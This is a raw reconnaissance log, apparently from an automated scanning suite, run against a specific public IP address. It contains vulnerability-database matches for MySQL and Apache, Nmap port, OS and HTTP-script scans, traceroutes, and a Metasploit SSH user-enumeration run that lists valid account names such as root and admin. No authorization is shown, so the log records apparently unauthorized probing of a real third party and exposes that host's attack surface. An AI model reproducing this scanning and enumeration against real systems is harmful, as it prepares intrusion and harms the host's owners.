11435| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
11436| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
11437| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
11438| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
11439| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
11440| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
11441| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
11442| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
11443| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
11444| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
11445| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
11446| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
11447| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
11448| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
11449| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
11450| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
11451| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
11452| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
11453| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
11454| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
11455| [59907] MySQL on Windows bind-address Remote Connection Weakness
11456| [59906] MySQL on Windows Default Configuration Logging Weakness
11457| [59616] MySQL Hashed Password Weakness
11458| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
11459| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
11460| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
11461| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
11462| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
11463| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
11464| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
11465| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
11466| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
11467| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
11468| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
11469| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
11470| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11471| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
11472| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
11473| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
11474| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
11475| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11476| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
11477| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
11478| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
11479| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11480| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11481| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
11482| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
11483| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
11484| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
11485| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
11486| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
11487| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
11488| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
11489| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
11490| [52464] MySQL charset Column Truncation Weakness
11491| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
11492| [52378] Cisco ANM MySQL root Account Default Password
11493| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
11494| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
11495| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
11496| [50892] MySQL Calendar index.php username Parameter SQL Injection
11497| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
11498| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
11499| [48710] MySQL Command Line Client HTML Output XSS
11500| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
11501| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
11502| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
11503| [47789] mysql-lists Unspecified XSS
11504| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
11505| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
11506| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
11507| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
11508| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
11509| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
11510| [43179] MySQL Server BINLOG Statement Rights Checking Failure
11511| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
11512| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
11513| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
11514| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
11515| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
11516| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
11517| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
11518| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
11519| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
11520| [39279] PHP mysql_error() Function XSS
11521| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
11522| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
11523| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
11524| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
11525| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
11526| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
11527| [37782] MySQL Community Server External Table View Privilege Escalation
11528| [37781] MySQL ALTER TABLE Information Disclosure
11529| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
11530| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
11531| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
11532| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
11533| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
11534| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
11535| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
11536| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
11537| [36251] Associated Press (AP) Newspower Default MySQL root Password
11538| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
11539| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
11540| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
11541| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
11542| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|3.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 4.4 (91%), Linux 3.10 - 3.12 (89%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.18 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 17 hops

TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 133.37 ms 10.245.200.1
2 ...
3 134.18 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 134.13 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 139.39 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 161.59 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 166.21 ms be2798.ccr42.fra03.atlas.cogentco.com (154.54.58.229)
8 166.16 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
9 169.57 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 161.78 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 252.54 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 253.87 ms 204.70.192.125
13 250.08 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 256.44 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 250.63 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 254.52 ms 64.89.38.2
17 252.80 ms 192.252.144.58
#######################################################################################################################################
WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 07:58 EST
Nmap scan report for 192.252.144.58
Host is up (0.24s latency).
Not shown: 482 filtered ports, 3 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open https
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 234.78 seconds
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:01 EST
Nmap scan report for 192.252.144.58
Host is up (0.15s latency).
Not shown: 2 filtered ports, 1 closed port
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
88/udp open|filtered kerberos-sec
123/udp open|filtered ntp
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
389/udp open|filtered ldap
500/udp open|filtered isakmp
520/udp open|filtered route

Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:01 EST
Nmap scan report for 192.252.144.58
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
21/tcp filtered ftp
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 133.52 ms 10.245.200.1
2 ...
3 130.90 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 130.54 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 136.14 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 158.12 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 166.20 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 162.74 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 166.15 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 162.53 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 254.11 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 257.76 ms 204.70.192.125
13 250.40 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 259.08 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 251.31 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 255.26 ms 64.89.38.2
17 258.77 ms 192.252.144.58
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:03 EST
Nmap scan report for 192.252.144.58
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
22/tcp filtered ssh
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 138.47 ms 10.245.200.1
2 ...
3 132.18 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 134.43 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 140.71 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 158.09 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 166.10 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 162.68 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 165.89 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 162.56 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 259.17 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 260.35 ms 204.70.192.125
13 252.78 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 258.37 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 251.61 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 254.76 ms 64.89.38.2
17 258.32 ms 192.252.144.58
#######################################################################################################################################
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => 192.252.144.58
RHOST => 192.252.144.58
[*] 192.252.144.58:22 - SSH - Using malformed packet technique
[*] 192.252.144.58:22 - SSH - Starting scan
[+] 192.252.144.58:22 - SSH - User 'admin' found
[+] 192.252.144.58:22 - SSH - User 'administrator' found
[-] 192.252.144.58:22 - SSH - User 'anonymous' on could not connect
[+] 192.252.144.58:22 - SSH - User 'backup' found
[+] 192.252.144.58:22 - SSH - User 'bee' found
[+] 192.252.144.58:22 - SSH - User 'ftp' found
[+] 192.252.144.58:22 - SSH - User 'guest' found
[-] 192.252.144.58:22 - SSH - User 'GUEST' on could not connect
[+] 192.252.144.58:22 - SSH - User 'info' found
[-] 192.252.144.58:22 - SSH - User 'mail' on could not connect
[+] 192.252.144.58:22 - SSH - User 'mailadmin' found
[-] 192.252.144.58:22 - SSH - User 'msfadmin' on could not connect
[-] 192.252.144.58:22 - SSH - User 'mysql' on could not connect
[+] 192.252.144.58:22 - SSH - User 'nobody' found
[-] 192.252.144.58:22 - SSH - User 'oracle' on could not connect
[+] 192.252.144.58:22 - SSH - User 'owaspbwa' found
[-] 192.252.144.58:22 - SSH - User 'postfix' on could not connect
[+] 192.252.144.58:22 - SSH - User 'postgres' found
[-] 192.252.144.58:22 - SSH - User 'private' on could not connect
[+] 192.252.144.58:22 - SSH - User 'proftpd' found
[-] 192.252.144.58:22 - SSH - User 'public' on could not connect
[+] 192.252.144.58:22 - SSH - User 'root' found
[-] 192.252.144.58:22 - SSH - User 'superadmin' on could not connect
[+] 192.252.144.58:22 - SSH - User 'support' found
[-] 192.252.144.58:22 - SSH - User 'sys' on could not connect
[+] 192.252.144.58:22 - SSH - User 'system' found
[-] 192.252.144.58:22 - SSH - User 'systemadmin' on could not connect
[+] 192.252.144.58:22 - SSH - User 'systemadministrator' found
[-] 192.252.144.58:22 - SSH - User 'test' on could not connect
[+] 192.252.144.58:22 - SSH - User 'tomcat' found
[-] 192.252.144.58:22 - SSH - User 'user' on could not connect
[-] 192.252.144.58:22 - SSH - User 'webmaster' on could not connect
[-] 192.252.144.58:22 - SSH - User 'www-data' on could not connect
[-] 192.252.144.58:22 - SSH - User 'Fortimanager_Access' on could not connect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
11866#######################################################################################################################################
11867HTTP/1.1 403 Forbidden
11868Date: Mon, 25 Nov 2019 13:17:32 GMT
11869Server: Apache
11870Upgrade: h2
11871Connection: Upgrade
11872Accept-Ranges: bytes
11873Content-Type: text/html
11874
11875Allow: GET,POST,OPTIONS,HEAD
#######################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://192.252.144.58...
___________________________________________ SITE INFO ___________________________________________
IP Title
192.252.144.58 Resource not found

____________________________________________ VERSION ____________________________________________
Name Versions Type
Apache 2.0.19 | 2.0.20 | 2.0.21 | 2.0.22 | 2.0.23 | 2.0.24 | 2.0.25 Platform
 2.0.26 | 2.0.27 | 2.0.28 | 2.0.29 | 2.0.30 | 2.0.31 | 2.0.32
 2.0.33 | 2.0.34 | 2.0.35 | 2.0.36 | 2.0.37 | 2.0.38 | 2.0.39
 2.0.40 | 2.0.41 | 2.0.42 | 2.0.43 | 2.0.44 | 2.0.45 | 2.0.46
 2.0.47 | 2.0.48 | 2.0.49 | 2.0.50 | 2.0.51 | 2.0.52 | 2.0.53
 2.0.54 | 2.0.55 | 2.0.56 | 2.0.57 | 2.0.58 | 2.0.59 | 2.0.60
 2.1.1 | 2.1.10 | 2.1.2 | 2.1.3 | 2.1.4 | 2.1.5 | 2.1.6
 2.1.7 | 2.1.8 | 2.1.9 | 2.2.0 | 2.2.1 | 2.2.2 | 2.2.3
 2.2.4 | 2.2.5

_________________________________________________________________________________________________
Time: 36.7 sec Urls: 600 Fingerprints: 40401
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:18 EST
NSE: Loaded 163 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:18
Completed NSE at 08:18, 0.00s elapsed
Initiating NSE at 08:18
Completed NSE at 08:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:18
Completed Parallel DNS resolution of 1 host. at 08:18, 0.05s elapsed
Initiating SYN Stealth Scan at 08:18
Scanning 192.252.144.58 [1 port]
Discovered open port 80/tcp on 192.252.144.58
Completed SYN Stealth Scan at 08:18, 0.30s elapsed (1 total ports)
Initiating Service scan at 08:18
Scanning 1 service on 192.252.144.58
Completed Service scan at 08:18, 6.51s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.252.144.58
Retrying OS detection (try #2) against 192.252.144.58
Initiating Traceroute at 08:18
Completed Traceroute at 08:18, 3.00s elapsed
Initiating Parallel DNS resolution of 16 hosts. at 08:18
Completed Parallel DNS resolution of 16 hosts. at 08:18, 0.29s elapsed
NSE: Script scanning 192.252.144.58.
Initiating NSE at 08:18
Completed NSE at 08:19, 53.52s elapsed
Initiating NSE at 08:19
Completed NSE at 08:19, 1.04s elapsed
Nmap scan report for 192.252.144.58
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
| http-brute:
|_ Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 603.36ms; min: 570.49ms; max: 626.80ms
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-date: Mon, 25 Nov 2019 13:18:45 GMT; 0s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=192.252.144.58
| Found the following error pages:
|
| Error Code: 403
|_ http://192.252.144.58:80/
|_http-feed: Couldn't find any feeds.
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-grep:
| (1) http://192.252.144.58:80/:
| (1) ip:
|_ + 192.252.144.58
| http-headers:
| Date: Mon, 25 Nov 2019 13:18:53 GMT
| Server: Apache
| Upgrade: h2
| Connection: Upgrade, close
| Accept-Ranges: bytes
| Transfer-Encoding: chunked
| Content-Type: text/html
|
|_ (Request type: GET)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-mobileversion-checker: No mobile version detected.
|_http-security-headers:
|_http-server-header: Apache
| http-sitemap-generator:
| Directory structure:
| /icons/expired/
| css: 1
| Longest directory structure:
| Depth: 2
| Dir: /icons/expired/
| Total files found (by extension):
|_ css: 1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Resource not found
| http-vhosts:
|_127 names had status 403
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-xssed: No previously reported XSS vuln.
| vulscan: VulDB - https://vuldb.com:
12096| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
12097| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
12098| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
| [131859] Apache Hadoop up to 2.9.1 privilege escalation
| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
| [130629] Apache Guacamole Cookie Flag weak encryption
| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
| [130123] Apache Airflow up to 1.8.2 information disclosure
| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
| [127007] Apache Spark Request Code Execution
| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
| [126346] Apache Tomcat Path privilege escalation
| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
